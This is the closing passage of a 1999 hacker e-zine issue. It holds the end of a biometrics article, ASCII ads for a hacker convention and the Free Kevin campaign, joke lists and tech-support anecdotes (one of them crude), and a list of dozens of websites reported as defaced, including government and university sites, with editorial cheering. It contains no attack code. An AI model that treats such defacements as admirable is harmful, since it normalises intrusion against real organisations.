Lack of standards. Integrating biometric systems with mainstream PC technology is a headache IT
execs don't need. But there's movement toward standards among consortiums such as BioAPI.
(See link below.)
Early failures. Vendors admit fingerprint sensor tools introduced last year weren't as robust as they
needed to be -- a black mark on a fledgling industry.
WHERE WE'RE GOING
Government will continue to be a hot market for biometric security, but experts see huge potential in
the financial community and the medical industry. The security issues that haunt corporate IT and
ecommerce make them obvious markets for biometrics too. (For some fascinating biometric
applications, see today's Special Report.) Here's how the Gartner Group predicts the biometric
emergence will happen:
- 2000: Full-scale rollout of iris recognition for
bank tellers and ATMs
- 2001: Fingerprint recognition becomes the
remote access tool of choice for corporations
that adopt biometrics
- 2002: Iris recognition gains lead over
fingerprints for installations serving many
users
What's your take on biometrics? Does the technology look like a long-term answer to our
security woes? Use TalkBack to tell me what you think. Or jump to my Berst Alert forum and hash it
out with other readers.
Too bad it's such a slow road to mainstream biometrics. Because some days I really do think
AnchorDesk has been possessed. No sooner had Jon offered to buy everyone lunch, then our GenX
associate editor Nicci Noteboom asked if I wanted her to stay late and help me with a project.
@HWA
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
<img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j
http:/ 99 http:o
http:/ login: sysadmin n99 httpi
/come. password: tp://comn
to/Can me.to/Cat
c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h
http:/ industry people to attend with booths and talks. 99 http:e
/come. you could have a booth and presentation for the cost of p://comel
http:/ little more than a doorprize (tba) contact us at our main n99http:i
http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s
http:/ for updates. This is the first Canadian event of its type invalid t
403 Fo and will have both white and black hat attendees, come out logged! !
404 Fi and shake hands with the other side... *g* mainly have some IP locked
ome.to fun and maybe do some networking (both kinds). see ya there! hostname
http:/ x99http:x
o/Canc x.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x
o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
<a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
/////////////////////////////////////////////////////////////&#
47;////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
The Top Ten Signs Your Co-worker Is a Computer Hacker.
10: You ticked him off once and your next phone bill was for $20,000.
9: He's won the Publisher's Clearing House sweepstakes 3 years running.
8: When asked for his phone number, he gives it in hex.
7: Seems strangely calm whenever the office LAN goes down.
6: Somehow gets HBO on his PC at work.
5: Mumbled, "Oh, puh-leeez" 95 times during the movie "The Net".
4: Massive 401k contribution made in half-cent increments.
3: His video dating profile lists "public-key encryption" among turn-ons.
2: When his computer starts up, you hear, "Good Morning, Mr. President".
1: You hear him murmur, "Let's see you use that Visa now, Professor I-Don't-Give-A's-In-Computer-Science!"
Most infamous things people do on their computer
http://www.vmnet.net/infamous.html
These are some of the better 'computer moments' we have found on the net. If you would like to add something just fill out the form below.
Our company used to sell time on our computers so very small companies that couldn't afford computers at the time could do their bookkeeping,
etc. One day, a new woman came in. She fumbled about for about 10 minutes but I paid no attention to her. Finally she came out and grumbled
something about how the computer wouldn't turn on. I grilled her with the usual obvious questions: Did you turn the switch on? Did you plug it in?
Did you turn on the switch on the power strip? She was sure she had done everything right. I was sure she neglected to plug one of the power cords
into the power strip. So, I went to investigate and she was *RIGHT*, she *HAD* plugged everything in to the power strip... including the power
strip's own power cord - talk about a ground loop!
A woman called the shop where she had bought a PC and complained that it didn't work properly: Every time she switched it on the screen was
filled with characters. Two technicians were sent out and were met by a woman with tits about twice the size of Dolly Parton's and glasses about
two centimeters thick. They asked her to switch on the computer. This she did, and then leaned over the keyboard to read what was on the
screen... The problem was quickly solved.
A tech support guy once told me that he got a call from someone saying that the computer screen just went black and the computer wouldn't
respond at all. The tech guy (starting with the obvious) asked the guy if the computer was still plugged in that maybe his foot had knocked the plug
out of the socket. The guy on the other end of the phone said to hold on that he would be back in a minute with a flashlight because the electricity
had just gone out in his building and he couldn't see under the desk without the lights....
I was trying to teach this sales person (for automated entrance system [they made gates]) how to enter his letters into Word Perfect. I told him to
select Word Perfect from his menu and when he did it gave him the opening screen which said, "Press any key to continue..." He looked at the
keyboard for awhile then asked me, "Where is the 'any' key?".
There is the classic one (which I hope is an urban myth) of the secretary working in an accounting firm who is told to make back up copies of the
discs every night. Every night she carfully collected together all the discs and took them away to copy them. After six months the hard disc crashed
but no-one was worried because they had backups, until the secretary brought in the huge pile of paper with a nice photocopied disc on each!
A user called the PC Support line of the university having trouble with her Mac. It was handed off to one of the Mac guys... "What seems to be the
problem?" "It's not working." Eyes roll. "What's not working?" "My Mac." - Five minutes of drawing the problem out of the woman deleted - Okay,
to access the files on the disk click the mouse on the picture of the disk." Pause. Nothing happened. I told you, I've already tried this." Support guy
makes as if he is strangling the phone. "Okay, do it again. Is the mouse moving?" "Yep." "On the screen?" "Yep." "Now click twice on the picture of
the disk." Pause and the consultant hears the two clicks again. "Nothing." "Maam, double-click once more for me." Clink-clink. "Maam, are you
hitting the screen with your mouse.......?"
While I was working in a placement office at the University, we helped students write their resumes on the computer. A student came up to me and
said he had problems reading the disk. I asked him to show it to me so I could see if I could recover the files, "Sure." he said, an took the disk (5
1/4" floppy) out of his pocket and unfolded it.
Another time, while working at a computer store, somebody who bought his computer from us was having trouble with one of his disks. The man
was living in another city, so I asked him to send me a copy of the disk, and I would take a look at it. A few days later, an envelope arrived for me,
it contained a "photocopy" of the front and back side of the disk
@HWA
SITE.1
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
From HNN rumours section, http://www.hackernews.com/ , another busy weekend for some folks...
May 17th
contributed by Anonymous
Cracked
http://www.chaoticmedia.com
http://assholes.hypermart.net
http://cct.georgetown.edu
http://cim.ucdavis.edu
http://heed.unh.edu
http://www.areahomes.com
http://www.basic.nwu.edu
http://www.shulin.gov.tw
http://www.starlette.org
http://www.utm.mx
http://www.csos.net
http://www.jobscape.be
http://www.wosc.osshe.edu
http://classdb.unl.edu
http://hesweb1.med.virginia.edu
http://mefisto.toi.tarman.pl
http://uhec.udmercy.edu
http://www.cpst.hu
http://www.euro-line.hu
http://www.gima.be
http://www.iti-inkjet.com
http://www.onestoprealty.com
http://www.randallphillipshomes.com
http://www.tele-base.com/
http://www.renewableresources.com
http://www.spouses.net
http://www.thehosemobile.com
http://e-net.net
http://www.funmax.com
http://www.csos.net
May 18th
From HNN rumours section, http://www.hackernews.com/
contributed by Anonymous
Cracked
The following sites have been reported to HNN as being
cracked.
http://ftp.meteofa.mil.ar
http://cae.artear.com.ar
http://www.gima.be
http://www.naturalbornassholes.com
http://www.hbo-latinamerica.com
http://www.gaminginvasion.com
http://cbpa.louisville.edu
http://cob-distance02.colorado.edu
http://pindar.ilt.columbia.edu
http://shadowflax.cs.byu.edu
http://www.actionbid.com
http://www.enoch.com
http://www.gis.dk
http://alspubs.lbl.gov
http://www.ncaur.usda.gov
http://www.phonephreaks.org
May 19th
From HNN's rumours section http://www.hackernews.com/
contributed by Anonymous
Cracked
The following have been reported as Cracked
http://bell.shops.bnl.gov
http://bernoulli.gsfc.nasa.gov
http://info.law.arizona.edu
http://htc149.hi-techcolor.com
http://secure.wcoil.com
http://www.synergetics.be
http://www.bewakers.com
http://www.firewallers.com
http://www.wave.be
http://www.senderex.com
http://data.accu-find.com
http://assets-www.idss.ida.org
http://proxy.tpg.gov.tw
http://raptor.jcu.edu.au
http://training.clemson.edu
http://www.theargon.com
http://www.khakiman.com
http://www.tyan.com
May 20th
From HNN's rumours section http://www.hackernews.com/
contributed by Anonymous
Cracked
The following sites have been reported to HNN as
cracked
http://www.state.vt.us
http://www.isci-cuautla.com.mx
http://www.nitro7.com
http://www.beaver.edu
http://isgdevel.sbt.com
http://www.bdsm.cz
http://(www.ies.ncsu.ed
http://bell.shops.bnl.gov
http://bernoulli.gsfc.nasa.gov
http://info.law.arizona.edu
http://htc149.hi-techcolor.com
http://secure.wcoil.com
May 21st
contributed by Anonymous
Cracked
The following have been reported to HNN as Cracked
http://uc.uww.edu
http://www.assassination.org
http://www.compdisk.com
http://askiris.toshiba.com
http://actinic.com
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
<a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
<a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
<a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
<a href="http://bewoner.dma.be/cum/">Go there</a>
Brasil........: http://www.psynet.net/ka0z
<a href="http://www.psynet.net/ka0z/">Go there</a>
http://www.elementais.cjb.net
<a href="http://www.elementais.cjb.net/">Go there</a>
Columbia......: http://www.cascabel.8m.com
<a href="http://www.cascabel.8m.com/">Go there</a>
http://www.intrusos.cjb.net
<a href="http://www.intrusos.cjb.net">Go there</a>
Indonesia.....: http://www.k-elektronik.org/index2.html
<a href="http://www.k-elektronik.org/index2.html">Go there</a>
http://members.xoom.com/neblonica/
<a href="http://members.xoom.com/neblonica/">Go there</a>
http://hackerlink.or.id/
<a href="http://hackerlink.or.id/">Go there</a>
Netherlands...: http://security.pine.nl/
<a href="http://security.pine.nl/">Go there</a>
Russia........: http://www.tsu.ru/~eugene/
<a href="http://www.tsu.ru/~eugene/">Go there</a>
Singapore.....: http://www.icepoint.com
<a href="http://www.icepoint.com">Go there</a>
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
<a href="http://www.trscene.org/">Go there</a>
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
